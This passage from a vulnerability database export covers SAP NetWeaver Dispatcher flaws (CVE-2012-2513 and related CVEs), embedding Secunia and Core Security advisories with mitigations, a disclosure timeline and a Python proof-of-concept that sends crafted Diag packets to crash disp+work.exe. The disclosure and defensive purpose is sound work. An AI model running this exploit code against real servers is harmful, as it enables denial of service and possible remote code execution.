}
},
"data": [
{
"date": "2016-11-23T00:00:00",
"db": "VULMON",
"id": "CVE-2016-9563"
},
{
"date": "2016-08-10T00:00:00",
"db": "BID",
"id": "92419"
},
{
"date": "2016-11-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005937"
},
{
"date": "2016-11-23T02:59:06.370000",
"db": "NVD",
"id": "CVE-2016-9563"
},
{
"date": "2016-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201611-535"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-04-29T00:00:00",
"db": "VULMON",
"id": "CVE-2016-9563"
},
{
"date": "2016-11-24T00:16:00",
"db": "BID",
"id": "92419"
},
{
"date": "2016-11-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005937"
},
{
"date": "2022-04-29T15:36:49.480000",
"db": "NVD",
"id": "CVE-2016-9563"
},
{
"date": "2021-11-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201611-535"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201611-535"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS JAVA of BC-BMT-BPM-DSK In XML External entity attack vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005937"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201611-535"
}
],
"trust": 0.6
}
}
var-201205-0131
Vulnerability from variot
The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch
TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities
SECUNIA ADVISORY ID: SA48980
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980
RELEASE DATE: 2012-05-09
DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/48980/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48980
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.
The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2.
Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies.
ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Advisory Information
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release
- Vulnerability Information
Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514
- Vulnerability Description
SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered.
- Vulnerable packages
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked.
- Non-vulnerable packages
. Vendor did not provide this information.
- Vendor Information, Solutions and Workarounds
SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:
- Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
- Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities).
-
Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
-
Credits
These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories .
- Technical Description / Proof of Concept Code
NOTE: (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
The following python script can be used to reproduce the vulnerabilities described below:
/----- import socket, struct from optparse import OptionParser
Parse the target options
parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args()
def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)
def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)
def initialize(sock):
diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
user_connect =
"\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
support_data = "\x10\x04\x0b\x00\x20"
support_data+=
"\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
support_data+=
"\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
dpheader =
"\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
dpheader+= struct.pack("I", len(diagheader + user_connect +
support_data))
dpheader+=
"\x00\xff\xff\xff\xff\xff\xff "
dpheader+= "terminalXXXXXXX"
dpheader+=
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
send_packet(sock, dpheader + diagheader + user_connect + support_data)
def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom)
Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection)
-----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.
8.1. SAP Netweaver DiagTraceR3Info Vulnerability
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability:
/----- crash = "X"114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/
8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability:
/----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/
8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability:
/----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/
8.4.
/----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/
8.5.
/----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/
8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack.
/----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/
- Report Timeline
. 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published.
- References
[1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.
[4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910.
- About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201205-0131",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp1 (disp+work.exe 7010.29.15.58313)"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp2 (disp+work.exe 7200.70.18.23869)"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002403"
},
{
"db": "NVD",
"id": "CVE-2012-2513"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-161"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2513"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security - Corelabs",
"sources": [
{
"db": "BID",
"id": "53424"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-161"
}
],
"trust": 0.9
},
"cve": "CVE-2012-2513",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2012-2513",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-2513",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201205-161",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2012-2513",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2513"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002403"
},
{
"db": "NVD",
"id": "CVE-2012-2513"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-161"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ----------------------------------------------------------------------\n\nBecome a PSI 3.0 beta tester!\nTest-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. \nDownload it here!\nhttp://secunia.com/psi_30_beta_launch\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Denial of Service and Code Execution Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA48980\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/48980/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48980\n\nRELEASE DATE:\n2012-05-09\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/48980/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/48980/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48980\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nCore Security Technologies has reported multiple vulnerabilities in\nSAP NetWeaver, which can be exploited by malicious people to cause a\nDoS (Denial of Service) and compromise a vulnerable system. \n\nThe vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nPROVIDED AND/OR DISCOVERED BY:\nMartin Gallo, Core Security Technologies. \n\nORIGINAL ADVISORY:\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. *Advisory Information*\n\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\nAdvisory ID: CORE-2012-0123\nAdvisory URL:\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\nDate published: 2012-05-08\nDate of last update: 2012-05-08\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Buffer overflow [CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,\nCVE-2012-2513, CVE-2012-2514\n\n\n3. *Vulnerability Description*\n\nSAP Netweaver [1] is a technology platform for building and integrating\nSAP business applications. By sending different messages, the different\nvulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. \n\n\n5. *Non-vulnerable packages*\n\n . Vendor did not provide this information. \n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note\nhttps://service.sap.com/sap/support/notes/1687910 regarding these\nissues. Contact SAP for further information. \n\nMartin Gallo proposed the following actions to mitigate the impact of\nthe vulnerabilities:\n\n 1. Disable work processes\u0027 Developer Traces for the \u0027Dialog\nProcessing\u0027 component (for the vulnerabilities [CVE-2011-1516],\n[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). \n 2. Restrict access to the Dispatcher service\u0027s TCP ports (3200/3299)\n(for all vulnerabilities). \n 3. Restrict access to the work process management transactions\nSM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the\nvulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and\n[CVE-2012-2512]). \n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Martin Gallo\nfrom\nhttp://www.coresecurity.com/content/services-overview-core-security-consulting-services. \nThe publication of this advisory was coordinated by Fernando Miranda\nfrom http://www.coresecurity.com/content/corelabs-advisories . \n\n\n8. *Technical Description / Proof of Concept Code*\n\n*NOTE:* (The tracing of \u0027Dialog processing\u0027 has to be in level 2 or 3 in\norder to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]\nand [CVE-2012-2512]). \n\nThe following python script can be used to reproduce the vulnerabilities\ndescribed below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3200)\n(options, args) = parser.parse_args()\n\ndef send_packet(sock, packet):\n packet = struct.pack(\"!I\", len(packet)) + packet\n sock.send(packet)\n\ndef receive(sock):\n length = sock.recv(4)\n (length, ) = struct.unpack(\"!I\", length)\n data = \"\"\n while len(data)\u003clength:\n data+= sock.recv(length)\n return (length, data)\n\ndef initialize(sock):\n diagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\n user_connect =\n\"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\"\n support_data = \"\\x10\\x04\\x0b\\x00\\x20\"\n support_data+=\n\"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\"\n support_data+=\n\"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n dpheader =\n\"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\n dpheader+= struct.pack(\"I\", len(diagheader + user_connect +\nsupport_data))\n dpheader+=\n\"\\x00\\xff\\xff\\xff\\xff\\xff\\xff \"\n dpheader+= \"terminalXXXXXXX\"\n dpheader+=\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n send_packet(sock, dpheader + diagheader + user_connect + support_data)\n\ndef send_message(sock, message):\n diagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n step = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\"\n eom = \"\\x0c\"\n send_packet(sock, diagheader + step + message + eom)\n\n# Connect and send initialization packet\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnection.connect((options.hostname, options.port))\ninitialize(connection)\nreceive(connection) \n\n-----/\n In the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*\n\n[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver\n\u0027disp+work.exe\u0027 